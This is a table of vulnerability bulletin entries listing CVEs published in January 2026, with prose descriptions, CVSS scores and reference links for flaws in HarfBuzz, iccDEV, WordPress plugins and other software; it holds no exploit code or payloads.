| harfbuzz--harfbuzz | HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0. | 2026-01-10 | 5.3 | CVE-2026-22693 | https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae |
| hayyatapps--Stylish Order Form Builder | The Stylish Order Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'product_name' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13531 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d9c4d9d-5d4c-4ea9-bf8d-0ee634f9ca7c?source=cve https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/trunk/functions-admin.php#L74 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/tags/1.0/functions-admin.php#L74 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/trunk/Pages/manage-forms/includes/all-products.php#L9 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/tags/1.0/Pages/manage-forms/includes/all-products.php#L9 |
| hblpay--HBLPAY Payment Gateway for WooCommerce | The HBLPAY Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'cusdata' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14875 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06362518-f2ee-485f-9e0e-1b1ada9c72db?source=cve https://plugins.trac.wordpress.org/browser/hblpay-payment-gateway-for-woocommerce/trunk/hblpay-paymentgateway-woocommerce.php#L248 |
| HCLSoftware--DevOps Deploy | In HCL DevOps Deploy 8.1.2.0 through 8.1.2.3, a user with LLM configuration privileges may be able to recover a credential previously saved for performing authenticated LLM Queries. | 2026-01-07 | 4.9 | CVE-2025-62327 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127336 |
| helpdeskcom--HelpDesk contact form plugin | The HelpDesk contact form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing or incorrect nonce validation on the handle_query_args() function. This makes it possible for unauthenticated attackers to update the plugin's license ID and contact form ID settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13657 | https://www.wordfence.com/threat-intel/vulnerabilities/id/342ece60-faf1-4fee-bf1e-6f6107f32861?source=cve https://plugins.trac.wordpress.org/browser/helpdesk-contact-form/trunk/includes/class-admin-page.php#L63 https://plugins.trac.wordpress.org/browser/helpdesk-contact-form/tags/1.1.5/includes/class-admin-page.php#L63 |
| IdeaBox Creations--Dashboard Welcome for Beaver Builder | Missing Authorization vulnerability in IdeaBox Creations Dashboard Welcome for Beaver Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Dashboard Welcome for Beaver Builder: from n/a through 1.0.8. | 2026-01-08 | 5.3 | CVE-2026-22488 | https://patchstack.com/database/wordpress/plugin/dashboard-welcome-for-beaver-builder/vulnerability/wordpress-dashboard-welcome-for-beaver-builder-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve |
| Ideagen--DevonWay | Ideagen DevonWay contains a stored cross-site scripting vulnerability. A remote, authenticated attacker could craft a payload in the 'Reports' page that executes when another user views the report. Fixed in 2.62.4 and 2.62 LTS. | 2026-01-08 | 5.5 | CVE-2026-22587 | |
| imtiazrayhan--ConvertForce Popup Builder | The ConvertForce Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Gutenberg block's `entrance_animation` attribute in all versions up to, and including, 0.0.7. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-14506 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c57b9a78-53f4-40bb-ae6a-c5242b41329f?source=cve https://plugins.trac.wordpress.org/browser/convertforce-popup-builder/trunk/inc/Blocks/Conversion.php#L47 https://plugins.trac.wordpress.org/browser/convertforce-popup-builder/trunk/inc/Blocks/Conversion.php#L66 https://plugins.trac.wordpress.org/changeset/3419678/ |
| indieweb--IndieWeb | The IndieWeb plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Telephone' parameter in all versions up to, and including, 4.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-14893 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b29f0fea-a2db-4b2e-b7b8-d15b2395e9e6?source=cve https://plugins.trac.wordpress.org/changeset/3423983/ |
| infosatech--WP Page Permalink Extension | The WP Page Permalink Extension plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.5.4. This is due to missing authorization checks on the `cwpp_trigger_flush_rewrite_rules` function hooked to `wp_ajax_cwpp_trigger_flush_rewrite_rules`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to flush the site's rewrite rules via the `action` parameter. | 2026-01-09 | 6.5 | CVE-2025-14172 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5ba37d7-8fde-4ee3-93db-d2459da34bc4?source=cve https://plugins.trac.wordpress.org/browser/change-wp-page-permalinks/trunk/change-wp-page-permalinks.php#L188 https://plugins.trac.wordpress.org/browser/change-wp-page-permalinks/tags/1.5.4/change-wp-page-permalinks.php#L188 |
| INIM Electronics s.r.l.--Smartliving SmartLAN/G/SI | Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. Attackers can exploit the onvif.cgi endpoint by specifying external domains to bypass firewalls and perform network enumeration through arbitrary HTTP requests. | 2026-01-07 | 5.3 | CVE-2019-25290 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47764 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry INIM Vendor Homepage |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have an Out-of-bounds Read, Use of Out-of-range Pointer Offset and have Improper Input Validation in its CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21487 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xq7x-9524-f7cp https://github.com/InternationalColorConsortium/iccDEV/issues/340 https://github.com/InternationalColorConsortium/iccDEV/commit/1516e2cafc253bb06fd3700d589a4ed0f09f7bd6 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Out-of-bounds Read, Heap-based Buffer Overflow and Improper Null Termination through its CIccTagText::Read function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21488 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4j2g-rvv4-86vg https://github.com/InternationalColorConsortium/iccDEV/commit/9daaccceb231c43db8cab312ee5bbe9d2aa6b153 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have Out-of-bounds Read and Integer Underflow (Wrap or Wraparound) vulnerabilities in its CIccCalculatorFunc::SequenceNeedTempReset function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21489 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph89-6q5h-wfw5 https://github.com/InternationalColorConsortium/iccDEV/commit/cfabfe52c9c7eb0481b62c8aad56580bb11efdad |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in heap buffer overflow in `CIccTagLut16::Validate()`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21490 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-9q9c-699q-xr2q https://github.com/InternationalColorConsortium/iccDEV/issues/397 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in unicode buffer overflow in `CIccTagTextDescription`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21491 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4pv4-4x2x-6j88 https://github.com/InternationalColorConsortium/iccDEV/issues/396 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Type Confusion in its CIccSingleSampledeCurveXml class during XML Curve Serialization. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.6 | CVE-2026-21493 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-p85g-f9q7-jmjx https://github.com/InternationalColorConsortium/iccDEV/issues/358 https://github.com/InternationalColorConsortium/iccDEV/commit/7ff76d1471077172f9659de8d9536443eac7c48f |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in heap buffer overflow in `CIccTagLut8::Validate()`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21494 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hjxv-xr7w-84fc https://github.com/InternationalColorConsortium/iccDEV/issues/398 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to a null pointer passed to memcpy() in CIccTagSparseMatrixArray. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 6.1 | CVE-2026-21503 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h554-qrfh-53gx https://github.com/InternationalColorConsortium/iccDEV/issues/367 https://github.com/InternationalColorConsortium/iccDEV/pull/417 https://github.com/InternationalColorConsortium/iccDEV/commit/55259a6395c4f6124b5d0e38469c77412926bd3d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap buffer overflow in the ToneMap parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 6.6 | CVE-2026-21504 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-rqp9-r53c-3m9h https://github.com/InternationalColorConsortium/iccDEV/issues/366 https://github.com/InternationalColorConsortium/iccDEV/pull/415 https://github.com/InternationalColorConsortium/iccDEV/commit/14fe3785e6b1f9992375b2a24617a0d7f6a70f95 https://github.com/InternationalColorConsortium/iccDEV/commit/23a38f83f2a5874a1c4427df59ec342af3277cad https://github.com/InternationalColorConsortium/iccDEV/blob/798be59011649a26a529600cc3cd56437634d3d0/IccProfLib/IccMpeBasic.cpp#L4557 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer dereference vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.5 | CVE-2026-21680 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mgp7-w4w3-mhx4 https://github.com/InternationalColorConsortium/iccDEV/issues/322 https://github.com/InternationalColorConsortium/iccDEV/pull/325 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccProfileXml::ParseBasic()` at `IccXML/IccLibXML/IccProfileXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.5 | CVE-2026-21689 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-5rqc-w93q-589m https://github.com/InternationalColorConsortium/iccDEV/issues/382 https://github.com/InternationalColorConsortium/iccDEV/pull/423 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccTagXmlTagData::ToXml()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.3 | CVE-2026-21690 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-2f26-vh48-38g6 https://github.com/InternationalColorConsortium/iccDEV/issues/393 https://github.com/InternationalColorConsortium/iccDEV/pull/426 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer member call vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 5.5 | CVE-2026-21492 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xpq3-v3jj-mgvx https://github.com/InternationalColorConsortium/iccDEV/issues/394 https://github.com/InternationalColorConsortium/iccDEV/pull/401 https://github.com/InternationalColorConsortium/iccDEV/commit/b200a629ada310137d6ae5c53fc9e6d91a4b0dae https://github.com/InternationalColorConsortium/iccDEV/commit/e72361d215351cbac0002466c4f936e94d6a99e7 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to division by zero in the TIFF Image Reader. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21495 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xhrm-79rg-5784 https://github.com/InternationalColorConsortium/iccDEV/commit/10c34179a0332a869c2b46e305a9cd23a6311dfe |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21496 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wj8m-6w77-r4rw https://github.com/InternationalColorConsortium/iccDEV/issues/381 https://github.com/InternationalColorConsortium/iccDEV/pull/405 https://github.com/InternationalColorConsortium/iccDEV/commit/0e51ceb427925b7e22f0465547df7506d35cda1c https://github.com/InternationalColorConsortium/iccDEV/commit/b5ad23aceece3789bdf1c47bae1ecf9d7bfcd26d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21497 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7gv7-cmrv-4j85 https://github.com/InternationalColorConsortium/iccDEV/issues/374 https://github.com/InternationalColorConsortium/iccDEV/pull/403 https://github.com/InternationalColorConsortium/iccDEV/commit/9419cac7f084197941994b8b9d17def204008385 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML calculator parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21498 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6822-qvxq-m736 https://github.com/InternationalColorConsortium/iccDEV/issues/375 https://github.com/InternationalColorConsortium/iccDEV/pull/404 https://github.com/InternationalColorConsortium/iccDEV/commit/75f124f40ba45491211cb4b67f0e05b7c7d59553 https://github.com/InternationalColorConsortium/iccDEV/commit/bdfa31940726aaabb0a6f19194d9062ba0598959 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21499 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c3pv-2cpf-7v2p https://github.com/InternationalColorConsortium/iccDEV/issues/372 https://github.com/InternationalColorConsortium/iccDEV/pull/412 https://github.com/InternationalColorConsortium/iccDEV/commit/00c03013e11b35ddbd7caae4368d1add185849d9 https://github.com/InternationalColorConsortium/iccDEV/commit/af299895bbcbecca6f67d6dc3d8e1dc92f1fc3fa https://github.com/InternationalColorConsortium/iccDEV/blob/8e71f0a701abcbd554725ba7b70258203e682a61/IccXML/IccLibXML/IccProfileXml.cpp#L477 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the XML calculator macro expansion. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21500 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4h4j-mm9w-2cp4 https://github.com/InternationalColorConsortium/iccDEV/issues/384 https://github.com/InternationalColorConsortium/iccDEV/pull/406 https://github.com/InternationalColorConsortium/iccDEV/commit/cce5f9b68a6c067b7ef898ccd5b000770745fb14 https://github.com/InternationalColorConsortium/iccDEV/commit/f295826a6f15add90490030f23b2ddd8593bff5b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the calculator parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21501 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-x7hw-h22p-2x4w https://github.com/InternationalColorConsortium/iccDEV/issues/365 https://github.com/InternationalColorConsortium/iccDEV/pull/413 https://github.com/InternationalColorConsortium/iccDEV/commit/798be59011649a26a529600cc3cd56437634d3d0 https://github.com/InternationalColorConsortium/iccDEV/commit/f3056ed99935d479091470127ad16f8be1912bb7 https://github.com/InternationalColorConsortium/iccDEV/blob/8e71f0a701abcbd554725ba7b70258203e682a61/IccProfLib/IccMpeCalc.cpp#L4588 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML tag parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21502 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-67r8-q3mh-42j6 https://github.com/InternationalColorConsortium/iccDEV/issues/368 https://github.com/InternationalColorConsortium/iccDEV/pull/407 https://github.com/InternationalColorConsortium/iccDEV/commit/d04c236775e89a029f93efcc242fdb1fbc245a1c https://github.com/InternationalColorConsortium/iccDEV/commit/d9e42a1fb2606e25e498eb94f34f6da89f522e35 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21505 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j577-8285-qrf9 https://github.com/InternationalColorConsortium/iccDEV/issues/361 https://github.com/InternationalColorConsortium/iccDEV/pull/419 https://github.com/InternationalColorConsortium/iccDEV/commit/3bbe2088b2796cf0aa4f7fa19f7ccd9ad1c7aba5 https://github.com/InternationalColorConsortium/iccDEV/commit/b1bb72fc3e9442ee1355aabae7314bb7d3fc9d41 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to Null pointer dereference in CIccProfileXml::ParseBasic(), leading to denial of service. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21506 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wfm7-m548-x4vp https://github.com/InternationalColorConsortium/iccDEV/issues/371 https://github.com/InternationalColorConsortium/iccDEV/pull/418 https://github.com/InternationalColorConsortium/iccDEV/commit/f2ea32372ad3ebbd29147940229cb9c5548fe033 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccTag::IsTypeCompressed()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 5.4 | CVE-2026-21691 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c9q5-x498-jv92 https://github.com/InternationalColorConsortium/iccDEV/issues/392 https://github.com/InternationalColorConsortium/iccDEV/pull/426 |
| INFINITUM FORM--Geo Controller | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in INFINITUM FORM Geo Controller allows DOM-Based XSS. This issue affects Geo Controller: from n/a through 8.5.2. | 2026-01-05 | 6.5 | CVE-2023-51513 | https://vdp.patchstack.com/database/wordpress/plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| itsourcecode--Society Management System | A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown part of the file /admin/edit_activity_query.php. The manipulation of the argument Title leads to SQL injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-01-05 | 6.3 | CVE-2026-0582 | VDB-339474; itsourcecode Society Management System edit_activity_query.php SQL injection VDB-339474; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731207; itsourcecode Society Management System V1.0 SQL Injection https://github.com/xiaotsai/tttt/issues/2 https://itsourcecode.com/ |
| ivole--Customer Reviews for WooCommerce | The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'displayName' parameter in all versions up to, and including, 5.93.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with customer-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. While it is possible to invoke the AJAX action without authentication, the attacker would need to know a valid form ID, which requires them to place an order. This vulnerability can be exploited by unauthenticated attackers if guest checkout is enabled. However, the form ID still needs to be obtained through placing an order. | 2026-01-07 | 6.4 | CVE-2025-14891 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88e4eec2-2861-4d1d-97eb-67887f59c745?source=cve https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/trunk/includes/reminders/class-cr-local-forms-ajax.php#L76 https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/trunk/templates/form-customer.php#L19 https://plugins.trac.wordpress.org/changeset/3424980/customer-reviews-woocommerce |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cross-site scripting vulnerability in the 'msg' parameter of pluginInstall.php that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated input to execute arbitrary JavaScript in victim browsers, potentially stealing authentication credentials and conducting phishing attacks. | 2026-01-07 | 6.1 | CVE-2019-25277 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange |
| jegstudio--Gutenverse Form Contact Form Builder, Booking, Reservation, Subscribe for Block Editor | The Gutenverse Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file upload in all versions up to, and including, 2.3.2. This is due to the plugin's framework component adding SVG to the allowed MIME types via the upload_mimes filter without implementing any sanitization of SVG file contents. This makes it possible for authenticated attackers, with Author-level access and above, to upload SVG files containing malicious JavaScript that executes when the file is viewed, leading to arbitrary JavaScript execution in victims' browsers. | 2026-01-08 | 6.4 | CVE-2025-14984 | https://www.wordfence.com/threat-intel/vulnerabilities/id/792fa6cb-e55a-4f68-b8a8-9039fb1ff694?source=cve https://plugins.trac.wordpress.org/browser/gutenverse-form/tags/2.3.2/lib/framework/includes/class-init.php#L837 https://plugins.trac.wordpress.org/browser/gutenverse-form/tags/2.3.2/lib/framework/includes/class-init.php#L169 https://plugins.trac.wordpress.org/changeset/3427504/gutenverse-form/trunk/lib/framework/includes/class-init.php?old=3395520&old_path=gutenverse-form%2Ftrunk%2Flib%2Fframework%2Fincludes%2Fclass-init.php |
| jegtheme--Jeg Kit for Elementor Powerful Addons for Elementor, Widgets & Templates for WordPress | The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.1 due to insufficient input sanitization in the countdown widget's redirect functionality. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript that will execute when an administrator or other user views the page containing the malicious countdown element. | 2026-01-08 | 6.4 | CVE-2025-14275 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8fcb4047-5173-4d10-a4bb-72f1919b9203?source=cve https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/tags/3.0.1/assets/js/elements/countdown.js#L1 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432624%40jeg-elementor-kit%2Ftrunk&old=3379532%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail= |
| jiujiujia--jjjfood | A vulnerability has been found in jiujiujia/victor123/wxw850227 jjjfood and jjjshop_food up to 20260103. This vulnerability affects unknown code of the file /index.php/api/product.category/index. The manipulation of the argument latitude leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product is distributed under multiple different names. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 6.3 | CVE-2026-0843 | VDB-340443; jiujiujia/victor123/wxw850227 jjjfood/jjjshop_food index SQL injection VDB-340443; CTI Indicators (IOB, IOC, TTP, IOA) Submit #731001; https://www.jiujiujia.net/ PHP-based Three-Dot Ordering System Vulnerable to SQL Injection latest SQL Injection http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/JJJshop/EnglishVers%E4%B8%89%E5%8B%BE%E7%82%B9%E9%A4%90%E7%B3%BB%E7%BB%9FPHP%E7%89%88%E5%AD%98%E5%9C%A8product.category.indexSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.pdf |
| jonua--Table Field Add-on for ACF and SCF | The Table Field Add-on for ACF and SCF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table Cell Content in all versions up to, and including, 1.3.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-12067 | https://www.wordfence.com/threat-intel/vulnerabilities/id/93f80716-a95b-49fc-805f-446d4723ca77?source=cve https://plugins.trac.wordpress.org/changeset/3386339/ |
| jseto--Travel Bucket List Wish To Go | The Wish To Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14053 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02b9450e-422f-45f1-a55b-cf401e39247c?source=cve https://plugins.trac.wordpress.org/browser/wish-to-go/trunk/wish-to-go.php#L124 https://plugins.trac.wordpress.org/browser/wish-to-go/tags/0.5.2/wish-to-go.php#L124 |
